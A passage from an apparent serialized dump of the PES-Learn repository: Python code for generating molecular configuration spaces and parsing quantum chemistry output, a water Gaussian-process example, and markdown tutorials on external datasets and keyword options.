Use a dummy atom to prevent.\".format(n_colinear))\n # Remove bad Z-Matrix geometries\n cartesians = cartesians[~colinear_atoms_bool]\n intcos = intcos[~colinear_atoms_bool]\n # Pre-allocate memory for interatomic distances array\n interatomics = np.zeros((cartesians.shape[0], self.n_interatomics))\n for atom in range(1, self.n_atoms):\n # Create an array of duplicated cartesian coordinates of this particular atom, for every geometry, which is the same shape as 'cartesians'\n tmp1 = np.broadcast_to(cartesians[:,atom,:], (cartesians.shape[0], 3))\n tmp2 = np.tile(tmp1, (self.n_atoms,1,1)).transpose(1,0,2)\n # Take the non-redundant norms of this atom to all atoms after it in cartesian array\n diff = tmp2[:, 0:atom,:] - cartesians[:, 0:atom,:]\n norms = np.sqrt(np.einsum('...ij,...ij->...i', diff , diff))\n # Fill in the norms into interatomic distances 2d array , n_interatomic_distances)\n if atom == 1:\n idx1, idx2 = 0, 1\n if atom > 1:\n x = int((atom**2 - atom) / 2)\n idx1, idx2 = x, x + atom\n interatomics[:, idx1:idx2] = norms \n print(\"Interatomic distances generated in {} seconds\".format(round((timeit.default_timer() - t2), 3)))\n # Round all coordinates for nicer printing and redundancy removal.\n intcos.round(10)\n interatomics.round(10)\n cartesians.round(10)\n self.n_disps = cartesians.shape[0]\n # Build DataFrame of all geometries \n self.all_geometries = pd.DataFrame(index=np.arange(0, cartesians.shape[0]), columns=self.bond_columns)\n self.all_geometries[self.bond_columns] = interatomics\n self.all_geometries['cartesians'] = [cartesians[i,:,:] for i in range(self.n_disps)]\n self.all_geometries['internals'] = [intcos[i,:] for i in range(self.n_disps)]\n print(\"Geometry grid generated in {} seconds\".format(round((timeit.default_timer() - t1),3)))\n return self.all_geometries\n # Memory is expensive to evaluate\n #print(\"Peak memory usage estimate (GB): \", 3*(self.all_geometries.memory_usage(deep=True).sum() + cartesians.nbytes + interatomics.nbytes + intcos.nbytes)* (1/1e9))\n\n def remove_redundancies(self):\n \"\"\"\n Very fast algorithm for removing redundant geometries from a configuration space\n Has been confirmed to work for C3H2, H2CO, H2O, CH4, C2H2 \n Not proven.\n \"\"\"\n start = timeit.default_timer()\n nrows_before = len(self.all_geometries.index)\n df = self.all_geometries.copy()\n df = df.round(10)\n og_cols = df.columns.tolist()\n # sort interatomic distance columns according to alphabetized bond types\n # e.g. OH HH CH --> CH HH OH\n alpha_bond_cols = [og_cols[i] for i in self.mol.alpha_bond_types_indices]\n alpha_bond_cols.append('cartesians')\n alpha_bond_cols.append('internals')\n df = df[alpha_bond_cols]\n df_cols = df.columns.tolist()\n # sort values of each 'bondtype' subpartition of interatomic distance columns\n # subpartitions are defined by the index of the first occurance of each \n # bond_type label. CH CH CH HH HH OH would be [0,3,5]. 
These define partition bounds.\n ind = self.mol.alpha_bond_types_first_occur_indices\n K = len(ind)\n # sort each subpartition\n for i in range(K):\n if i < (K - 1):\n cut = slice(ind[i], ind[i+1])\n mask = df_cols[cut]\n df.loc[:,mask] = np.sort(df.loc[:,mask].values, axis=1)\n else:\n mask = df_cols[i:self.n_interatomics]\n df.loc[:,mask] = np.sort(df.loc[:,mask].values, axis=1)\n\n # Remove duplicates\n # invert the duplicate boolean Series (which marks duplicates as True)\n mask = ~df.duplicated(subset=self.bond_columns)\n self.unique_geometries = self.all_geometries.loc[mask] \n self.n_disps = len(self.unique_geometries.index)\n print(\"Redundancy removal took {} seconds\".format(round((timeit.default_timer() - start),2)))\n print(\"Removed {} redundant geometries from a set of {} geometries\".format(nrows_before-self.n_disps, nrows_before))\n\n def filter_configurations(self):\n \"\"\"\n Filters the configuration space by computing the norms between geometries.\n Accepts the first point, then the point farthest from that point.\n Each subsequently added point is the one farthest from \n the set of currently accepted points. \n \"\"\"\n start = timeit.default_timer()\n npoints = self.input_obj.keywords['grid_reduction']\n if npoints > self.unique_geometries.shape[0]:\n raise Exception(\"grid_reduction number of points is greater than the number of points in dataset\")\n print(\"Reducing size of configuration space from {} datapoints to {} datapoints\".format(self.n_disps, npoints))\n df = self.unique_geometries.copy()\n df = df[self.bond_columns]\n df['E'] = \"\" \n # pandas saved as objects, convert to floats so numpy doesn't reject it\n df = df.apply(pd.to_numeric)\n sampler = DataSampler(df, npoints, accept_first_n=None)\n sampler.structure_based()\n accepted_indices, rejected_indices = sampler.get_indices()\n self.unique_geometries = self.unique_geometries.iloc[accepted_indices] \n print(\"Configuration space reduction complete in {} seconds\".format(round((timeit.default_timer() - start),2)))\n\n def add_redundancies_back(self):\n \"\"\"\n #TODO currently does not account for simultaneous permutations\n Takes self.unique_geometries (which contains [bond_columns], cartesians, internals)\n and adds two columns, 'duplicate_internals' and 'duplicate_interatomics', which contain coordinate dictionaries of duplicate geometries\n \"\"\"\n # WARNING: straightforward duplicates are not dropped from self.all_geometries elsewhere, so there\n # may be multiple matches of 'new' in tmp_geoms; dropping them here is a workaround, and it is\n # not yet clear whether it causes problems\n self.all_geometries = self.all_geometries.drop_duplicates(subset=self.bond_columns)\n # add column of duplicates, each row has its own empty list\n self.unique_geometries['duplicate_internals'] = np.empty((len(self.unique_geometries), 0)).tolist()\n self.unique_geometries['duplicate_interatomics'] = np.empty((len(self.unique_geometries), 0)).tolist()\n # current column structure of self.unique_geometries:\n # [interatomics], cartesians, internals, duplicate_internals, duplicate_interatomics\n\n # grab interatomic distance equivalent permutation operations\n bond_indice_permutations = ph.permute_bond_indices(self.mol.atom_count_vector)\n bond_permutation_vectors = ph.induced_permutations(self.mol.atom_count_vector, bond_indice_permutations) \n # list of lists of bond interatomics from self.all_geometries\n tmp_geoms = self.all_geometries[self.bond_columns].values.tolist() \n # for every permutation on every unique geometry, apply 
the permutation and see if it exists in the original dataset;\n # if it does, add the internal and interatomic distance coordinates of the duplicate from the original geom dataset to the duplicates columns in self.unique_geometries\n for perm in bond_permutation_vectors:\n permuted_rows = []\n for row in self.unique_geometries.itertuples(index=False):\n # apply the permutation to the interatomic distances (row[0:-4]) and check if it changed; if it did, check if it is in the original geom dataset \n # if it is in the original dataset, and not already in the duplicates column of self.unique_geometries, add it \n new = [row[0:-4][i] for i in perm] \n if new != list(row[0:-4]):\n if new in tmp_geoms:\n intcoord = self.all_geometries.iloc[tmp_geoms.index(new)]['internals'] #grab internal coords\n # add duplicate to duplicate_internals column if it has not been found\n if intcoord not in row[-2]:\n row[-2].append(intcoord)\n # save as OrderedDict since internal coordinates are also OrderedDict\n idm = OrderedDict(self.all_geometries.iloc[tmp_geoms.index(new)][self.bond_columns]) #grab interatomic distance coords\n # add duplicate to duplicate_interatomics column if it has not been found\n if idm not in row[-1]:\n row[-1].append(idm) \n\n\n def generate_PES(self, template_obj):\n # generate the full geometry set or the removed redundancy geometry set?\n self.generate_geometries()\n if self.input_obj.keywords['remove_redundancy'].lower().strip() == 'true':\n print(\"Removing symmetry-redundant geometries...\", end=' ')\n self.remove_redundancies()\n\n if self.input_obj.keywords['grid_reduction']:\n self.filter_configurations()\n if self.input_obj.keywords['remember_redundancy'].lower().strip() == 'true':\n self.add_redundancies_back()\n df = self.unique_geometries \n elif self.input_obj.keywords['remove_redundancy'].lower().strip() == 'false':\n df = self.all_geometries\n \n pes_dir_name = self.input_obj.keywords['pes_dir_name']\n if not os.path.exists(\"./\" + pes_dir_name):\n os.mkdir(\"./\" + pes_dir_name)\n os.chdir(\"./\" + pes_dir_name)\n\n for i, cart_array in enumerate(df['cartesians'], start=1):\n # build xyz input file and put in directory\n xyz = ''\n xyz += template_obj.header_xyz()\n for j in range(len(self.mol.std_order_atoms)):\n xyz += \"%s %10.10f %10.10f %10.10f\\n\" % (self.mol.std_order_atom_labels[j], cart_array[j][0], cart_array[j][1], cart_array[j][2])\n xyz += template_obj.footer_xyz()\n if not os.path.exists(str(i)):\n os.mkdir(str(i))\n\n # tag with internal coordinates, include duplicates if requested\n with open(\"{}/geom\".format(str(i)), 'w') as f:\n tmp_dict = OrderedDict(zip(self.mol.geom_parameters, list(df.iloc[i-1]['internals'])))\n f.write(json.dumps([tmp_dict]))\n #f.write(json.dumps([df.iloc[i-1]['internals']])) \n if 'duplicate_internals' in df:\n for j in range(len(df.iloc[i-1]['duplicate_internals'])):\n f.write(\"\\n\")\n tmp_dict = OrderedDict(zip(self.mol.geom_parameters, df.iloc[i-1]['duplicate_internals'][j]))\n f.write(json.dumps([tmp_dict]))\n #f.write(json.dumps([df.iloc[i-1]['duplicate_internals'][j]])) \n # tag with interatomic distance coordinates, include duplicates if requested\n with open(\"{}/interatomics\".format(str(i)), 'w') as f:\n f.write(json.dumps([OrderedDict(df.iloc[i-1][self.bond_columns])]))\n if 'duplicate_interatomics' in df:\n for j in range(len(df.iloc[i-1]['duplicate_interatomics'])):\n f.write(\"\\n\") \n f.write(json.dumps([df.iloc[i-1]['duplicate_interatomics'][j]])) \n # write input file for electronic structure theory package \n with 
open(\"{}/{}\".format(str(i), self.input_obj.keywords['input_name']), 'w') as f:\n f.write(xyz)\n\n os.chdir(\"../\")\n print(\"Your PES inputs are now generated. Run the jobs in the {} directory and then parse.\".format(pes_dir_name))\n \n\n def old_remove_redundancies(self):\n \"\"\"\n Deprecated. Currently a bug: does not consider combined permutation operations,\n just one at a time. \n Theoretically rigorous, but slow.\n Handles the removal of redundant geometries arising from \n angular scans and like-atom position permutations\n \"\"\"\n start = timeit.default_timer()\n nrows_before = len(self.all_geometries.index)\n # first remove straightforward duplicates using interatomic distances\n # (e.g., angular, dihedral equivalencies)\n self.all_geometries[self.bond_columns] = self.all_geometries[self.bond_columns].round(decimals=10)\n self.unique_geometries = self.all_geometries.drop_duplicates(subset=self.bond_columns)\n print(\"Removed {} angular-redundant geometries. Now removing permutation-redundant geometries.\".format(len(self.all_geometries) - len(self.unique_geometries)))\n # remove like-atom permutation duplicates\n bond_indice_permutations = ph.permute_bond_indices(self.mol.atom_count_vector)\n bond_permutation_vectors = ph.induced_permutations(self.mol.atom_count_vector, bond_indice_permutations) \n print(\"Interatomic distances equivalent permutations: \", bond_permutation_vectors)\n for perm in bond_permutation_vectors:\n new_df = []\n permuted_rows = []\n for row in self.unique_geometries.itertuples(index=False):\n # apply induced bond permutation derived from like-atom permutations\n # the first n rows are the interatomic distances which we want to permute, the last two rows are the cartesian and internal coordinates\n new = [row[0:-2][i] for i in perm] \n # add new geometry to checklist\n permuted_rows.append(new)\n # if its unaffected by the permutation, we want to keep one copy\n if new == list(row[0:-2]):\n new_df.append(row)\n # uniqueness check\n if list(row[0:-2]) not in permuted_rows:\n new_df.append(row)\n # update dataframe with removed rows for this particular permutation vector\n self.unique_geometries = pd.DataFrame(new_df)\n nrows_after = len(self.unique_geometries.index)\n print(\"Redundancy removal complete {} seconds\".format(round((timeit.default_timer() - start),2)))\n print(\"Removed {} redundant geometries from a set of {} geometries\".format(nrows_before-nrows_after, nrows_before))\n\n\n def old_generate_geometries(self):\n \"\"\"\n Deprecated. 
Generates geometries in serial, converting Z-Matrices to cartesians to interatomics one at a time.\n The current implementation replaces this with array operations, converting the coordinates of all geometries simultaneously.\n \"\"\"\n start = timeit.default_timer()\n intcos = self.generate_displacements() \n self.disps = []\n for gridpoint in intcos:\n tmp = OrderedDict([(self.mol.unique_geom_parameters[i], gridpoint[i]) for i in range(intcos.shape[1])])\n self.disps.append(tmp)\n # grab cartesians, internals, interatomics representations of geometry\n cartesians = []\n internals = []\n interatomics = []\n failed = 0 # keep track of failed 3 co-linear atom configurations\n # this loop of geometry transformations/saving is pretty slow, but scales linearly at least\n for i, disp in enumerate(self.disps):\n self.mol.update_intcoords(disp)\n try:\n cart = self.mol.zmat2xyz()\n except:\n failed += 1\n continue\n cartesians.append(cart)\n internals.append(disp)\n idm = gth.get_interatom_distances(cart)\n # remove float noise for duplicate detection\n idm = np.round(idm[np.tril_indices(len(idm),-1)],10)\n interatomics.append(idm)\n # preallocate dataframe space \n if failed > 0:\n print(\"Warning: {} configurations had invalid Z-Matrices with 3 co-linear atoms, tossing them out! Use a dummy atom to prevent this.\".format(failed))\n df = pd.DataFrame(index=np.arange(0, len(self.disps)-failed), columns=self.bond_columns)\n df[self.bond_columns] = interatomics\n df['cartesians'] = cartesians\n df['internals'] = internals \n self.all_geometries = df\n print(\"Geometry grid generated in {} seconds\".format(round((timeit.default_timer() - start),2)))\n" }, { "alpha_fraction": 0.5295508503913879, "alphanum_fraction": 0.5594956874847412, "avg_line_length": 28.511627197265625, "blob_id": "6250e5017e59ca1fbeca95dc81835bfb1407ffd9", "content_id": "d358830f3ef0732fba18880deaa7ef20cd3ee567", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1269, "license_type": "permissive", "max_line_length": 78, "num_lines": 43, "path": "/Examples/1_water_api_example/gaussian_process/build.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "import peslearn\n\ninput_string = (\"\"\"\n O \n H 1 r1\n H 1 r2 2 a2 \n \n r1 = [0.85,1.20, 5]\n r2 = [0.85,1.20, 5]\n a2 = [90.0,120.0, 5]\n\n energy = 'regex'\n use_pips = true\n energy_regex = 'Total Energy\s+=\s+(-\d+\.\d+)'\n hp_maxit = 15\n training_points = 50\n sampling = structure_based\n \"\"\")\n\ninput_obj = peslearn.InputProcessor(input_string)\ntemplate_obj = peslearn.datagen.Template(\"./template.dat\")\nmol = peslearn.datagen.Molecule(input_obj.zmat_string)\nconfig = peslearn.datagen.ConfigurationSpace(mol, input_obj)\nconfig.generate_PES(template_obj)\n\n# run single point energies with Psi4\nimport os\nos.chdir(\"PES_data\")\ndirs = [i for i in os.listdir(\".\") if os.path.isdir(i) ]\nfor d in dirs:\n os.chdir(d)\n if \"output.dat\" not in os.listdir('.'):\n print(d, end=', ')\n os.system(\"psi4 input.dat\")\n os.chdir(\"../\")\nos.chdir(\"../\")\n\nprint('\\nParsing ab initio data...')\npeslearn.utils.parsing_helper.parse(input_obj, mol)\n\nprint('\\nBeginning GP optimization...')\ngp = peslearn.ml.gaussian_process.GaussianProcess(\"PES.dat\", input_obj, 'A2B')\ngp.optimize_model()\n" }, { "alpha_fraction": 0.40185657143592834, "alphanum_fraction": 0.6894744634628296, "avg_line_length": 39.725608825683594, "blob_id": "18f116e83d72a3b8253b171f6cef60c292f39b60", "content_id": 
"ca56c510a19220597c51df5e63dd24b2faa386b5", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6679, "license_type": "permissive", "max_line_length": 567, "num_lines": 164, "path": "/1_Tutorials/2_loading_external_datasets/external_dataset_tutorial.md", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "# Training models with datasets not created by PES-Learn \n\nPES-Learn supports building ML models from user-supplied datasets in many flexible formats. This tutorial covers all of the different kinds of datasets which can be loaded in and used.\n\n# 1. Supported Dataset Types \n# 1.1 Cartesian Coordinates\n**Note:** When PES-Learn imports Cartesian coordinate files, it re-orders the atoms to its standard ordering scheme. This was found to be necessary in order to enable the use of permutation invariant polynomials with externally supplied datasets. PES-Learn's standard atom order sorts elements by most common occurance, with an alphabetical tiebraker. For example, if the Cartesian coordinates of acetate C<sub>2</sub>H<sub>3</sub>O<sub>2</sub> were given in the order C,C,H,H,H,O,O, they would be automatically re-ordered to H<sub>3</sub>C<sub>2</sub>O<sub>2</sub>. \n\n**The software uses the set of interatomic distances for the geometries**, which are defined to be the row-wise order of the interatomic distance matrix in standard order:\n```\n H H H C C O O\nH \nH r0\nH r1 r2\nC r3 r4 r5\nC r6 r7 r8 r9\nO r10 r11 r12 r13 r14\nO r15 r16 r17 r18 r19 r20\n```\nThus, in all the following water examples, the HOH atom order is internally reordered to HHO.\n\nThe \"standard\" way to express geometry, energy pairs with Cartesian coordinates is the following:\n\n```\n3\n-76.02075832627291\nH 0.000000000000 -0.671751442127 0.596572464600\nO -0.000000000000 0.000000000000 -0.075178977527\nH -0.000000000000 0.671751442127 0.596572464600\n\n3\n-76.0264333762269331\nH 0.000000000000 -0.727742220982 0.542307610016\nO -0.000000000000 0.000000000000 -0.068340619196\nH -0.000000000000 0.727742220982 0.542307610016\n\n3\n-76.0261926533675592\nH 0.000000000000 -0.778194442078 0.483915467021\nO -0.000000000000 0.000000000000 -0.060982147482\nH -0.000000000000 0.778194442078 0.483915467021\n```\n\n\n\nHere, there is a number indicating the number of atoms, an energy on its own line in Hartrees, and Cartesian coordinates in Angstroms. 
\n## Flexibility of Cartesian Coordinate Input:\n* The **atom number** is **not needed**\n\n```\n-76.02075832627291\nH 0.000000000000 -0.671751442127 0.596572464600\nO -0.000000000000 0.000000000000 -0.075178977527\nH -0.000000000000 0.671751442127 0.596572464600\n\n-76.0264333762269331\nH 0.000000000000 -0.727742220982 0.542307610016\nO -0.000000000000 0.000000000000 -0.068340619196\nH -0.000000000000 0.727742220982 0.542307610016\n\n-76.0261926533675592\nH 0.000000000000 -0.778194442078 0.483915467021\nO -0.000000000000 0.000000000000 -0.060982147482\nH -0.000000000000 0.778194442078 0.483915467021\n```\n\n* **Blank lines** between each datablock are **not needed**\n\n```\n-76.02075832627291\nH 0.000000000000 -0.671751442127 0.596572464600\nO -0.000000000000 0.000000000000 -0.075178977527\nH -0.000000000000 0.671751442127 0.596572464600\n-76.0264333762269331\nH 0.000000000000 -0.727742220982 0.542307610016\nO -0.000000000000 0.000000000000 -0.068340619196\nH -0.000000000000 0.727742220982 0.542307610016\n-76.0261926533675592\nH 0.000000000000 -0.778194442078 0.483915467021\nO -0.000000000000 0.000000000000 -0.060982147482\nH -0.000000000000 0.778194442078 0.483915467021\n```\n* Your **whitespace delimiters do not matter at all**, and can be completely erratic, if you're into that:\n\n```\n-76.02075832627291\nH 0.000000000000 -0.671751442127 0.596572464600\nO -0.000000000000 0.000000000000 -0.075178977527\nH -0.000000000000 0.671751442127 0.596572464600\n-76.0264333762269331\nH 0.000000000000 -0.727742220982 0.542307610016\nO -0.000000000000 0.000000000000 -0.068340619196\nH -0.000000000000 0.727742220982 0.542307610016\n-76.0261926533675592\nH 0.000000000000 -0.778194442078 0.483915467021\nO -0.000000000000 0.000000000000 -0.060982147482\nH -0.000000000000 0.778194442078 0.483915467021\n```\n\n* You can **use Bohr instead of Angstroms** (just remember the model is trained in terms of Bohr when using it in the future!), and you can use whatever energy unit you want (though keep in mind PES-Learn assumes it is Hartrees when converting units to wavenumbers (cm<sup>-1</sup>))\n\n# 1.2 Arbitrary internal coordinates\n**Note**: The keyword option `use_pips` should be set to `false` when using your own internal coordinates, unless the coordinates correspond to the standard order PES-Learn uses for interatomic distances, described above.\n\nFor internal coordinates, the first line requires a series of geometry parameter labels, with the last column being the energies labeled with `E`. One can use internal coordinates with comma or whitespace delimiters. A few examples:\n```\na1,r1,r2,E\n104.5,0.95,0.95,-76.026433\n123.0,0.95,0.95,-76.026193\n 95.0,0.95,0.95,-76.021038\n```\n\n```\na1 r1 r2 E\n104.5 0.95 0.95 -76.026433\n123.0 0.95 0.95 -76.026193\n95.0 0.95 0.95 -76.021038\n```\n```\nr0 r1 r2 E\n1.4554844420 0.9500000000 0.9500000000 -76.0264333762\n1.5563888842 0.9500000000 0.9500000000 -76.0261926534\n1.6454482672 0.9500000000 0.9500000000 -76.0210378425\n```\n\n# 2. Creating ML models with the datasets\n\nUsing an external dataset called `dataset_name` is the same whether it is a Cartesian coordinate or internal coordinate file. 
\nWith the Python API:\n```python\nimport peslearn\n\ninput_string = (\"\"\"\n use_pips = false\n hp_maxit = 15\n training_points = 500\n sampling = structure_based\n \"\"\")\n\ninput_obj = peslearn.InputProcessor(input_string)\ngp = peslearn.ml.GaussianProcess(\"dataset_name\", input_obj)\ngp.optimize_model()\n```\n\nUsing a neural network:\n```python\nnn = peslearn.ml.NeuralNetwork(\"dataset_name\", input_obj)\nnn.optimize_model()\n```\n\nUsing the command line interface, an input file could be:\n```python\nuse_pips = false\nhp_maxit = 15\ntraining_points = 1000\nsampling = smart_random\nml_model = gp\npes_name = 'dataset_name'\n```\n\nUsing the Python API, one can even partition and supply their own training, validation, and testing datasets:\n```python\nnn = peslearn.ml.NeuralNetwork('full_dataset_name', input_obj, train_path='my_training_set', valid_path='my_validation_set', test_path='my_test_set')\nnn.optimize_model()\n```\n" }, { "alpha_fraction": 0.8026315569877625, "alphanum_fraction": 0.8026315569877625, "avg_line_length": 29.399999618530273, "blob_id": "df35f1a70bb9dc247c240d6673172941df69aa01", "content_id": "4237f019fd8429740c7e121c66107a6afd65e956", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 152, "license_type": "permissive", "max_line_length": 39, "num_lines": 5, "path": "/peslearn/utils/__init__.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "from . import regex\nfrom . import permutation_helper\nfrom . import parsing_helper\nfrom . import geometry_transform_helper\nfrom . import printing_helper\n" }, { "alpha_fraction": 0.5755395889282227, "alphanum_fraction": 0.5948147177696228, "avg_line_length": 41.31609344482422, "blob_id": "ad955f3f6d84d5e54ebca44803e4decec0916d88", "content_id": "8de513b0ef576ee6939444e4ffb75393fd2b1899", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7367, "license_type": "permissive", "max_line_length": 134, "num_lines": 174, "path": "/peslearn/datagen/outputfile.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nContains the OutputFile class for extracting information from output files produced by electronic structure theory codes\n\"\"\"\n\nfrom ..utils import regex\nfrom .. import constants\n\nimport re\nimport numpy as np\nimport cclib.io.ccio as ccio\n\nclass OutputFile(object):\n \"\"\"\n A class for extracting information from output (log) files produced by electronic structure theory codes \n Parameters\n ----------\n output_path : str\n A string representing a file path to an output (log) file \n \"\"\"\n def __init__(self, output_path):\n self.output_path = output_path\n # save the output as a string \n with open(output_path, \"r\") as f: \n self.output_str = f.read()\n\n def extract_energy_with_regex(self, energy_regex):\n \"\"\"\n Finds the energy value (a float) in an output file according to a user-supplied\n regular expression identifier.\n \n Example:\n Suppose your output file contains:\n \n FINAL ELECTRONIC ENERGY (Eh): -2.3564983498\n\n One can obtain this floating point number with the regex identifier:\n \s*FINAL ELECTRONIC ENERGY \(Eh\):\s+(-\d+\.\d+)\n\n Checking one's regular expression is easy with online utilities such as pythex (see pythex.org)\n\n Parameters\n ---------\n energy_regex : str\n A string containing the regex code for capturing an energy floating point number.\n e.g. 
\"\\s*FINAL ELECTRONIC ENERGY \\(Eh\\):\\s+(-\\d+\\.\\d+)\"\n\n Returns\n -------\n last_energy : float\n The last energy value matching the regular expression identifier \n \"\"\"\n last_energy = 0.0\n tmp = re.findall(energy_regex, self.output_str)\n if tmp:\n last_energy = float(tmp[-1])\n return last_energy\n # how do we handle cases when output files do not produce the energy?\n # we do not want to kill the program, but we also want to communicate that something went wrong during that computation \n else:\n return None \n\n def extract_energy_with_cclib(self, cclib_attribute, energy_index=-1):\n \"\"\"\n Attempts to extract energies with cclib \n Parameters\n ---------\n cclib_attribute : str\n The cclib target attribute. Valid options can be found in cclib documentation.\n Examples include \"ccenergies\", \"scfenergies\", or \"mpenergies\"\n energy_index : int\n Which energy to grab from the output file which matches the cclib_attribute. \n Default is -1, the last energy printed in the output file which matches the cclib_attribute. \n \"\"\"\n try:\n cclib_outputobj = ccio.ccread(self.output_path) \n except:\n e = None \n return e\n e = None \n # for whatever reason, sometimes each energy is a single element list, so we have to code around that \n # also, cclib does not handle things well if something fails to parse, needtry/except pairs \n if cclib_attribute == \"scfenergies\":\n try:\n e = cclib_outputobj.scfenergies[-1] \n if isinstance(e, list):\n e = e[0]\n except:\n e = None \n if cclib_attribute == \"mpenergies\":\n try:\n e = cclib_outputobj.mpenergies[-1] \n if isinstance(e, list):\n e = e[0]\n except:\n e = None \n if cclib_attribute == \"ccenergies\":\n try:\n e = cclib_outputobj.ccenergies[-1] \n if isinstance(e, list):\n e = e[0]\n except:\n e = None \n # cclib puts energies into eV... ugh \n if e: \n e /= constants.hartree2ev\n return e \n \n def extract_cartesian_gradient_with_regex(self, header, footer, grad_line_regex):\n \"\"\"\n Extracts cartesian gradients according to user supplied regular expressions.\n A bit more tedious to use than the energy regex extractor as the size of the regular expressions may be quite long.\n Requires that the electronic structure theory code prints the cartesian gradient in a logical way.\n A \"header\" and \"footer\" identifier is needed so we don't accidentally parse things that *look like* gradients, like geometries\n\n Example: \n CARTESIAN GRADIENT: (header)\n (optional extra text\n that does not match grad_line_regex)\n Atom 1 O 0.00000 0.23410 0.32398 (grad_line_regex)\n Atom 2 H 0.02101 0.09233 0.01342 \n Atom 3 N 0.01531 0.04813 0.06118\n (optional extra text that does not match grad_line_regex)\n (footer)\n \n Parameters\n ----------\n header : str\n A string of regular expressions which match unique text that is before and close to the gradient data\n footer : str\n A string of regular expressions for text that comes close to after the gradient data (does not need to be unique)\n grad_line_regex : str\n A regex identifier for one line of gradient data. The regex must work for ALL lines of the gradient, so be sure\n to make it general enough. 
Must use capture groups () for the x, y, and z components\n For example, if the output file gradient is \n Atom 1 Cl 0.00000 0.23410 0.32398 \n Atom 2 H 0.02101 0.09233 0.01342 \n Atom 3 N 0.01531 0.04813 0.06118\n A valid argument for grad_line_regex would be \"Atom\s+\d+\s+[A-Z,a-z]+\s+(-?\d+\.\d+)\s+(-?\d+\.\d+)\s+(-?\d+\.\d+)\"\n This can easily be tested with online utilities such as pythex (see pythex.org)\n Returns\n -------\n gradient : np.array\n A numpy array of floats representing the cartesian gradient\n \"\"\"\n # warning: cartesian reorientation by quantum chemistry software may mess this up\n # grab all text after the header\n trimmed_str = re.split(header, self.output_str)[-1]\n # isolate gradient data using footer\n trimmed_str = re.split(footer, trimmed_str)[0] \n # look for gradient line regex \n gradient = re.findall(grad_line_regex, trimmed_str)\n #TODO add catch for when only some lines of the gradient are parsed but not all, check against number of atoms or something\n if gradient:\n # this gradient is a list of tuples, each tuple is an x, y, z for one atom\n gradient = np.asarray(gradient).astype(float)\n return gradient \n else:\n return None\n\n def extract_cartesian_gradient_with_cclib(self, grad_index=-1):\n \"\"\"\n Attempts to extract the cartesian gradient with cclib \n Parameters\n ---------\n grad_index : int\n Which gradient to grab from the output file. \n Default is -1, the last gradient printed in the output file. \n \"\"\"\n # warning: cartesian reorientation by quantum chemistry software may mess this up\n cclib_outputobj = ccio.ccread(self.output_path) \n if hasattr(cclib_outputobj, 'grads'):\n return cclib_outputobj.grads[-1]\n else:\n return None\n\n\n\n\n" }, { "alpha_fraction": 0.6796206831932068, "alphanum_fraction": 0.6854963302612305, "avg_line_length": 44.11627960205078, "blob_id": "f45d7f239f18ed4eedf670e7c8ba03e28fe5cc8b", "content_id": "759c443cadb7ca3bd3e18ff26ffc762c574311eb", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 9701, "license_type": "permissive", "max_line_length": 532, "num_lines": 215, "path": "/3_Keywords/keywords.md", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "# PES-Learn Keyword Options \n\n### How to assign PES-Learn keywords...\n* Using command line interface:\n * In your PES-Learn input file, `input.dat`, all keywords are assigned the same way: \n \n ```\n keyword1 = option1\n keyword2 = option2\n ```\n \n\n* Using Python API:\n * In your Python code, after importing PES-Learn, you may freely dump keywords into a multi-line string and assign them just as you would when using the command line interface, and then create an InputProcessor object, which holds all of the keyword options and is passed to most other objects in PES-Learn:\n \n```python\nimport peslearn\n \ninput_string = \"\"\"\n keyword1 = option1\n keyword2 = option2\n \"\"\"\ninput_obj = peslearn.InputProcessor(input_string)\n```\n * Once an `InputProcessor` object is created, new keywords can be set with the `set_keyword` method:\n \n ```python\n inp_obj = peslearn.InputProcessor(\"\")\n inp_obj.set_keyword({'keyword':'option'})\n ```\n \n \n**Note:** Some keywords must be surrounded in single `'` or double `\"` quotes. These keywords all assign either regular expressions or user-specified names of files/directories for the software to use, such as the name of the dataset, the name of written electronic structure theory code input files, and the name of electronic structure theory code output files. Rule of thumb: if it's a name assignment or regex, use quotes.
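\n\nFor instance (an illustrative fragment, not a complete input file; the file name shown is hypothetical):\n\n```\nenergy_regex = 'Total Energy\s+=\s+(-\d+\.\d+)' # a regex: quote it\npes_name = 'water_pes.dat' # a name assignment: quote it\ntraining_points = 800 # a plain value: no quotes needed\n```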
\n\n**Note:** PES-Learn just looks for the keywords in your input, case-insensitive. If you spell something wrong, it will just be ignored. If you want to comment something out, use the pound sign `#` before the text you want removed.\n\nWhen using the command line interface `python path/to/peslearn/driver.py`, to specify which mode to run the software in, use:\n* `mode = generate`, `mode = parse`, or `mode = learn`, or the corresponding shorthand `mode = g`, `mode = p`, `mode = l` \nIf this keyword is not used, the software will ask what you want to do.\n\n## Data Generation Keywords\n\n* `input_name` \n **Description:** The name of generated input files for electronic structure theory packages. \n * **Type**: string, surrounded by quotes\n * **Default**: 'input.dat'\n * **Possible values**: any string\n\n\n* `output_name` \n **Description:** The name of electronic structure theory package output (log) files which PES-Learn will attempt to parse.\n * **Type**: string, surrounded by quotes\n * **Default**: 'output.dat'\n * **Possible values**: any string \n\n\n* `energy` \n **Description:** Energy parsing method, regular expressions or cclib.\n * **Type**: string\n * **Default**: None\n * **Possible values**: regex, cclib \n\n\n* `energy_regex` \n **Description:** Regular expression pattern which captures the electronic energy from an electronic structure theory code output file. Always takes the last occurring match in the output file. Floating point numbers `(-\d+\.\d+)` should be surrounded by parentheses to capture just the number. It is recommended to check your regular expressions with [Pythex](https://pythex.org/). Simply copy the part of the output file you are trying to capture as well as your trial regular expression to see if it properly captures the energy. \n * **Type**: string, surrounded by quotes\n * **Default**: None\n * **Possible values**: Any regular expression string.\n\n\n* `energy_cclib` \n **Description:** Use cclib to parse energies from output files. Takes the last occurrence captured by cclib. \n * **Type**: string\n * **Default**: None\n 